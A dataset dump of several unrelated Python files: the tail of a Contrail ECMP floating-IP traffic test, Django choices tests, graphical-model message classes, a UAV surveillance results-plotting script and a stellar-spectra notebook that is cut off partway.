if ((fip_addr_vm1 == my_fip) and (fip_addr_vm2 == my_fip)):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
# Check for the FIP route entry
for vm_node_ip in vm_node_ips:
inspect_h2 = self.agent_inspect[vm_node_ip]
fvn_vrf_id1 = inspect_h2.get_vna_vrf_objs(
domain, project, fvn)['vrf_list'][0]['ucindex']
nh1 = inspect_h2.get_vna_active_route(
vrf_id=fvn_vrf_id1, ip=my_fip, prefix='32')
if not nh1:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
# Check the composite next-hops of the FIP route entry
for vm_node_ip in vm_node_ips:
tap_intf_list = []
inspect_h9 = self.agent_inspect[vm_node_ip]
agent_vrf_objs = inspect_h9.get_vna_vrf_objs(domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], fvn_vrf_name)
fvn_vrf_id9 = agent_vrf_obj['ucindex']
paths = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=my_fip, prefix='32')['path_list']
self.logger.info('There are %s nexthops to %s on Agent %s' %
(len(paths), my_fip, vm_node_ip))
next_hops = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
if not next_hops:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
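# Walk the composite next-hop (mc_list): Tunnel entries point at a remote
# compute node, where the route is resolved again down to tap Interface
# entries; local Interface entries are taps directly.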
for nh in next_hops:
label = nh['label']
if nh['type'] == 'Tunnel':
destn_agent = nh['dip']
inspect_hh = self.agent_inspect[destn_agent]
agent_vrf_objs = inspect_hh.get_vna_vrf_objs(
domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], fvn_vrf_name)
fvn_vrf_id5 = agent_vrf_obj['ucindex']
next_hops_in_tnl = inspect_hh.get_vna_active_route(
vrf_id=fvn_vrf_id5, ip=my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
for next_hop in next_hops_in_tnl:
if next_hop['type'] == 'Interface':
tap_intf_from_tnl = next_hop['itf']
tap_intf_list.append(tap_intf_from_tnl)
elif nh['type'] == 'Interface':
tap_intf = nh['itf']
tap_intf_list.append(tap_intf)
agent_tap_intf_list[vm_node_ip] = tap_intf_list
self.logger.info('The list of Tap interfaces from the agents are %s' %
agent_tap_intf_list)
# a_list= agent_tap_intf_list.values()
# result= all(x == a_list[0] for x in a_list)
# if result == True:
# self.logger.info('The Tap interface list is the same across agents')
# else:
# assert result, 'The Tap interface list across agents is incorrect'
# Starting two flows of TCP traffic from fvn_vm1 to the FIP
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to %s' % my_fip)
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream_list = [stream1, stream2]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream' % (
stream_sent_count[stream], stream_recv_count[stream])
# Checking Flow Records
flow_result = False
flow_result2 = False
rev_flow_result = False
rev_flow_result1 = False
vn1_vrf_id = vm1.get_vrf_id(vn1_fq_name, vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(vn1_fq_name, vn1_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(fvn_fq_name, fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
dpi1 = unicode(dport1)
dpi2 = unicode(dport2)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=my_fip, sport=udp_src, dport=dpi1, protocol='6')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=my_fip, sport=udp_src, dport=dpi2, protocol='6')
if flow_rec1 is not None:
assert not flow_result, 'Duplicate Flow detected'
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
assert not flow_result2, 'Duplicate Flow detected'
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi2, vm_node_ip))
rev_flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi1, dport=udp_src, protocol='6')
rev_flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi2, dport=udp_src, protocol='6')
if (rev_flow_rec1 or rev_flow_rec2):
assert not rev_flow_result, 'Duplicate Reverse Flow detected'
rev_flow_result = True
self.logger.info(
'Reverse flow records between %s and %s seen properly on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
else:
rev_flow_result = rev_flow_result or False
self.logger.info(
'Reverse flow records between %s and %s not seen on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi1, dport=udp_src, protocol='6')
rev_flow_rec4 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi2, dport=udp_src, protocol='6')
if (rev_flow_rec3 or rev_flow_rec4):
assert not rev_flow_result1, 'Duplicate Reverse Flow detected'
rev_flow_result1 = True
self.logger.info(
'Reverse flow records between %s and %s seen properly on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
else:
rev_flow_result1 = rev_flow_result1 or False
self.logger.info(
'Reverse flow records between %s and %s not seen on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, udp_src, my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, udp_src, my_fip, dpi2)
assert (
rev_flow_result or rev_flow_result1), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_two_vms_same_fip
def get_matching_vrf(self, vrf_objs, vrf_name):
return [x for x in vrf_objs if x['name'] == vrf_name][0]
def remove_from_cleanups(self, fix):
for cleanup in self._cleanups:
# if fix.cleanUp in cleanup:
self._cleanups.remove(cleanup)
# break
# end remove_from_cleanups
# end TestECMP
[record stats and quality-signal columns omitted]
[next record: valdergallo/django-choices-flow :: tests/test_choices.py (Python, BSD-2-Clause-FreeBSD, 3,452 bytes)]
# -*- coding: utf-8 -*-
from django.test import TestCase
from django_choices_flow import Choices
class MyChoices(Choices):
NEW = (1, 'New content') # 'New content' is the display text
WAIT = (2, 'Wait')
CANCELED = (-1, 'Canceled')
ERROR = (-2, 'Error')
INVOICED = (3, 'Invoiced')
INVOICED_VALIDATION_NAME = (4, 'Invoiced Validation Name')
# set transaction rules
NEW_RULES = [WAIT, INVOICED, CANCELED, ERROR]
WAIT_RULES = [CANCELED, ERROR, INVOICED]
INVOICED_RULES = [CANCELED]
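# The *_RULES lists above define the allowed transitions: Choices.validate(current, new)
# returns the new value when the transition is permitted and False otherwise,
# as test_rules_transaction_return_ok/_false below exercise.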
class TestChoices(TestCase):
def setUp(self):
self.choices = MyChoices
def test_key_value(self):
self.assertEqual(self.choices.NEW, 1)
self.assertEqual(self.choices.WAIT, 2)
self.assertEqual(self.choices.CANCELED, -1)
self.assertEqual(self.choices.ERROR, -2)
self.assertEqual(self.choices.INVOICED, 3)
def test_len_choices(self):
self.assertEqual(len(self.choices), 6)
def test_iter_list(self):
self.assertEqual(sorted(list(self.choices)),
sorted([(-1, 'Canceled'), (-2, 'Error'), (3, 'Invoiced'),
(1, 'New content'), (2, 'Wait'), (4, 'Invoiced Validation Name')]), self.choices)
def test_repr_choice(self):
self.assertEqual(str(sorted(self.choices)),
str(sorted([(-1, 'Canceled'), (-2, 'Error'), (3, 'Invoiced'),
(1, 'New content'), (2, 'Wait'), (4, 'Invoiced Validation Name')])), self.choices)
def test_get_value(self):
self.assertEqual(self.choices.get_value(1), 'New content')
def test_rules_transaction_return_ok(self):
self.assertEqual(self.choices.validate(self.choices.NEW, self.choices.WAIT), 2)
def test_rules_transaction_return_false(self):
self.assertEqual(self.choices.validate(self.choices.INVOICED, self.choices.WAIT), False)
class MyChoicesSingle(Choices):
NEW = 1
WAIT = 2
CANCELED = -1
ERROR = -2
INVOICED = 3
# set transaction rules
NEW_RULES = [WAIT, INVOICED, CANCELED, ERROR]
WAIT_RULES = [CANCELED, ERROR, INVOICED]
INVOICED_RULES = [CANCELED]
class TestChoicesSingle(TestCase):
def setUp(self):
self.choices = MyChoicesSingle
def test_key_value(self):
self.assertEqual(self.choices.NEW, 1)
self.assertEqual(self.choices.WAIT, 2)
self.assertEqual(self.choices.CANCELED, -1)
self.assertEqual(self.choices.ERROR, -2)
self.assertEqual(self.choices.INVOICED, 3)
def test_len_choices(self):
self.assertEqual(len(self.choices), 5)
def test_iter_list(self):
self.assertEqual(sorted(list(self.choices)), sorted([(-1, 'CANCELED'), (-2, 'ERROR'),
(3, 'INVOICED'), (1, 'NEW'), (2, 'WAIT')]), self.choices)
def test_repr_choice(self):
self.assertEqual(str(sorted(self.choices)),
str(sorted([(-1, 'CANCELED'), (-2, 'ERROR'),
(3, 'INVOICED'), (1, 'NEW'), (2, 'WAIT')])), self.choices)
def test_get_value(self):
self.assertEqual(self.choices.get_value(1), 'NEW')
def test_rules_transaction_return_ok(self):
self.assertEqual(self.choices.validate(self.choices.NEW, self.choices.WAIT), 2)
def test_rules_transaction_return_false(self):
self.assertEqual(self.choices.validate(self.choices.INVOICED, self.choices.WAIT), False)
[record stats and quality-signal columns omitted]
[next record: junkyul/gmid2-public :: gmid2/basics/message.py (Python, MIT, 3,528 bytes)]
# from __future__ import annotations
from typing import Iterable
from sortedcontainers import SortedSet, SortedDict
from gmid2.basics.factor import Variable, Factor
class Message:
"""
Message is a composite of factors created from one cluster and send to another cluster
"""
mid = 0
def __init__(self, src: int=None, dest: int=None):
self.mid = Message.mid
Message.mid += 1
self.src = src
self.dest = dest
@classmethod
def reset_mid(cls):
cls.mid = 0
def __hash__(self):
return hash(self.mid)
def __str__(self):
return type(self).__name__ + self.str_post_fix()
def str_post_fix(self):
return "_{}:[{}, {}]".format(self.mid, self.src, self.dest)
class PolicyConstraint(Message): # used for submodel graph decomposition
def __init__(self, *args, **kwargs):
# def __init__(self, src:int=None, dest: int=None):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix()
class ScopedMessage(Message):
def __init__(self, scope_vids: Iterable[int], *args, **kwargs):
self.scope_vids = SortedSet(scope_vids)
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
def merge_scope(self, other):
self.scope_vids.update(other.scope_vids)
class TransitionConstraint(ScopedMessage):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
class Separator(ScopedMessage):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
class ConsistencyConstraint(ScopedMessage):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self):
return type(self).__name__ + self.str_post_fix() + "[v:[{}]]".format(",".join(str(el) for el in self.scope_vids))
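# Minimal usage sketch (illustrative only; the ids and scope values are made up):
#   sep = Separator([0, 2, 5], src=1, dest=2)
#   str(sep)  # e.g. "Separator_0:[1, 2][v:[0,2,5]]"
#   sep.merge_scope(Separator([2, 7], src=1, dest=3))  # scope_vids grows to {0, 2, 5, 7}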
[record stats and quality-signal columns omitted]
[next record: brunoolivieri/surveillanceStrategies :: python/old/2017 early/old.05/analysis - v1.py (Python, BSD-3-Clause, 11,537 bytes)]
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.style.use('ggplot')
fileIn="cleanDataFile-2code.txt"
# to use with Jupyter; remove when running from bash
#%matplotlib inline
# plot sample
#df_file.loc[df_file['nPOIs'] == 20].boxplot('globalAvgDelay',['nPOIs','Strategy'],sym='')  # the bracketed columns drive the groupBy
# reading data: clumsy round-trip through a temp file to get the grouped means, but it works
df_file = pd.read_csv(fileIn,sep=';', index_col =["Strategy", "nUAV", "nPOIs"] )
df_file.groupby(level=["Strategy","nUAV","nPOIs"]).mean().to_csv("_tmp_.txt", sep=';', encoding='utf-8')
df_data_MEAN = pd.read_csv("_tmp_.txt",sep=';', encoding='utf-8' )
# data MEAN to plot
df_data_MEAN_sparse = df_data_MEAN.loc[df_data_MEAN['nPOIs'] == 20]
df_data_MEAN_dense = df_data_MEAN.loc[df_data_MEAN['nPOIs'] == 200]
df_file_raw = pd.read_csv(fileIn,sep=';', index_col =["Strategy", "mapName", "nPOIs"] )
df_file_raw.groupby(level=["Strategy","mapName","nPOIs"]).mean().to_csv("_tmp2_.txt", sep=';', encoding='utf-8')
df_data_RAW = pd.read_csv("_tmp2_.txt",sep=';', encoding='utf-8' )
## data RAW to plot
df_data_RAW_sparse = df_data_RAW.loc[df_data_RAW['nPOIs'] == 20]
df_data_RAW_dense = df_data_RAW.loc[df_data_RAW['nPOIs'] == 200]
#markers=['s-','o-','^-']
markers=['s-', 'o--', '^-.', '^:']
##########################################################################################################################
print('Files imported...')
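# Every metric section below repeats the same grouped line-plot pattern.
# A helper along these lines (an illustrative sketch; the explicit blocks
# below are kept as-is and do not call it) could fold each section into one
# call, reusing the module-level markers list:
def plot_metric(df, y, xlabel, ylabel, title, outfile, x='nUAV', xlim=(1, 17)):
    fig, ax = plt.subplots()
    labels = []
    for i, (key, grp) in enumerate(df.groupby('Strategy')):
        # one line per strategy, cycling through the marker styles
        ax = grp.plot(ax=ax, kind='line', x=x, y=y, style=markers[i])
        labels.append(key)
    if xlim:
        ax.set_xlim(*xlim)
    lines, _ = ax.get_legend_handles_labels()
    ax.set(xlabel=xlabel, ylabel=ylabel)
    ax.legend(lines, labels, loc='best')
    plt.title(title)
    plt.savefig(outfile, dpi=100)
# e.g. plot_metric(df_data_MEAN_sparse, 'SucessTax', 'Número de UAVs',
#                  'Taxa de Recuperação de Dados', 'TD_t - ESPARÇO',
#                  '_SucessTax_Sparse.png')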
# SucessTax plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='SucessTax', style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="Taxa de Recuperação de Dados")
ax.legend(lines, labels, loc='best')
plt.title('TD_t - ESPARÇO')
plt.savefig('_SucessTax_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='SucessTax',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="Taxa de Recuperação de Dados")
ax.legend(lines, labels, loc='best')
plt.title('TD_t - DENSO')
plt.savefig('_SucessTax_Dense.png', dpi=100)
########################################################################################
# throughput plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='throughput',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="throughput")
ax.legend(lines, labels, loc='best')
plt.title('throughput - ESPARÇO')
plt.savefig('_throughput_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='throughput',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="throughput")
ax.legend(lines, labels, loc='best')
plt.title('throughput - DENSO')
plt.savefig('_throughput_Dense.png', dpi=100)
########################################################################################
# globalAvgDelay plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='globalAvgDelay',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - ESPARÇO')
plt.savefig('_globalAvgDelay_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='globalAvgDelay',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - DENSO')
plt.savefig('_globalAvgDelay_Dense.png', dpi=100)
########################################################################################
# maxData/starvation plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='maxData',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="maxData")
ax.legend(lines, labels, loc='best')
plt.title('maxData - ESPARÇO')
plt.savefig('_maxData_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='maxData',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="maxData")
ax.legend(lines, labels, loc='best')
plt.title('maxData - DENSO')
plt.savefig('_maxData_Dense.png', dpi=100)
########################################################################################
# TaxPerPathSize/Efficient plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='TaxPerPathSize',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="TaxPerPathSize")
ax.legend(lines, labels, loc='best')
plt.title('TaxPerPathSize - ESPARÇO')
plt.savefig('_TaxPerPathSize_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_MEAN_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='nUAV', y='TaxPerPathSize',style=markers[i])
ax.set_xlim(1, 17);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="Número de UAVs", ylabel="TaxPerPathSize")
ax.legend(lines, labels, loc='best')
plt.title('TaxPerPathSize - DENSO')
plt.savefig('_TaxPerPathSize_Dense.png', dpi=100)
########################################################################################
# tourSize/mapa plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='tourSize',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="tourSize")
ax.legend(lines, labels, loc='best')
plt.title('tourSize - ESPARÇO')
plt.savefig('_tourSize_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='tourSize',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="tourSize")
ax.legend(lines, labels, loc='best')
plt.title('tourSize - DENSO')
plt.savefig('_tourSize_Dense.png', dpi=100)
########################################################################################
# delay/mapa plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='globalAvgDelay',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - ESPARÇO')
plt.savefig('_globalAvgDelay_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='globalAvgDelay',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="globalAvgDelay")
ax.legend(lines, labels, loc='best')
plt.title('globalAvgDelay - DENSO')
plt.savefig('_globalAvgDelay_Dense.png', dpi=100)
########################################################################################
# processingTime/mapa plots #####################################################################
#### Sparse
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_sparse.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='simumationTimeMS',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="simumationTimeMS")
ax.legend(lines, labels, loc='best')
plt.title('simumationTimeMS/map - ESPARÇO')
plt.savefig('_simumationTimeMS_map_Sparse.png', dpi=100)
#### Dense
fig, ax = plt.subplots()
labels = []
i=0
for key, grp in df_data_RAW_dense.groupby('Strategy'):
ax = grp.plot(ax=ax, kind='line', x='mapName', y='simumationTimeMS',style=markers[i])
#ax.set_xlim(0, 101);
labels.append(key)
i+=1
lines, _ = ax.get_legend_handles_labels()
ax.set(xlabel="maps", ylabel="simumationTimeMS")
ax.legend(lines, labels, loc='best')
plt.title('simumationTimeMS/map - DENSO')
plt.savefig('_simumationTimeMS_map_Dense.png', dpi=100)
########################################################################################
[record stats and quality-signal columns omitted]
[next record: jason-neal/phoenix_notes :: Artucus with models.py (Python, MIT, 13,655 bytes)]
# coding: utf-8
# In[1]:
from spectrum_overload import Spectrum
import glob
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import string
from astropy.io import fits
from astro_scripts.plot_fits import get_wavelength, ccf_astro, vac2air
from loading_phoenix import load_phoenix_aces, load_Allard_Phoenix, align2model
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
def align2model(spectrum, model):
rv1, r_sun, c_sun, x_sun, y_sun = ccf_astro((spectrum.xaxis, -spectrum.flux + 1), (model.xaxis, -model.flux + 1))
spectrum.doppler_shift(-rv1)
print(rv1)
return spectrum
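# Note: this local align2model shadows the one imported from loading_phoenix above.
# It estimates the radial-velocity offset by cross-correlating the inverted spectra
# (1 - flux), then Doppler-shifts the observed spectrum onto the model's frame.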
# .7 files can also be read with readUnit7 from PyAstronomy's phoenix utils, but that gives the result in /cm, not /Angstrom (a factor of 10**8 that comes from DF for the new models)
# # Synthetic Artucus
# Using the models with Teff 4300, 1.5 logg, -0.0 [Fe/H]
#
# Daniel used -0.5 Fe/H
#
# load_Allard_Phoenix returns wavelength in nanometers.
# Using vac2air to convert to air (it expects Angstroms), hence the *10 / 10 fudge
# In[3]:
w_settl, f_settl, bb_settl = load_Allard_Phoenix("data/lte043.0-2.5-0.0a+0.0.BT-Settl.spec.7")
settl_spec = Spectrum(xaxis=vac2air(w_settl*10)/10, flux=f_settl)
w_dusty_spec, f_dusty_spec, bb_dusty_spec = load_Allard_Phoenix("data/lte043-2.5-0.0.BT-Dusty.spec.7")
dusty_spec = Spectrum(xaxis=vac2air(w_dusty_spec*10)/10, flux=f_dusty_spec)
w_next, f_next, bb_next = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-NextGen.7")
next_spec = Spectrum(xaxis=vac2air(w_next*10)/10, flux=f_next)
w_cond, f_cond, bb_cond = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-Cond.7")
cond_spec = Spectrum(xaxis=vac2air(w_cond*10)/10, flux=f_cond)
w_aces, f_aces = load_phoenix_aces("data/lte04300-2.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes.fits")
aces_spec = Spectrum(xaxis=vac2air(w_aces*10)/10, flux=f_aces)
# In[4]:
w_aces, f_aces = load_phoenix_aces("data/lte04300-1.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes.fits")
aces_spec_15 = Spectrum(xaxis=vac2air(w_aces*10)/10, flux=f_aces)
(aces_spec_15 - aces_spec).plot()
plt.title("Difference between 1.5 and 2.5 logg for phoenix aces")
plt.show()
# In[5]:
# Full Spectrum
plt.figure(figsize=(15, 10))
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[6]:
# COMPARISON TO PHOENIX ACES
# Full Spectrum Differences
plt.figure(figsize=(15, 15))
ax0 = plt.subplot(411)
(aces_spec - settl_spec).plot(axis=ax0)
plt.title("PHOENIX ACES - BT-Settl")
plt.ylabel("Flux")
ax1 = plt.subplot(412)
(settl_spec - cond_spec).plot(axis=ax1)
plt.title("BT-Settl- BT-Cond")
plt.ylabel("Flux")
ax2 = plt.subplot(413)
(dusty_spec - cond_spec).plot(axis=ax2)
plt.title("BT-Dusty-BT-Cond")
ax3 = plt.subplot(414)
(next_spec - cond_spec).plot(axis=ax3)
plt.title("NextGen - Cond")
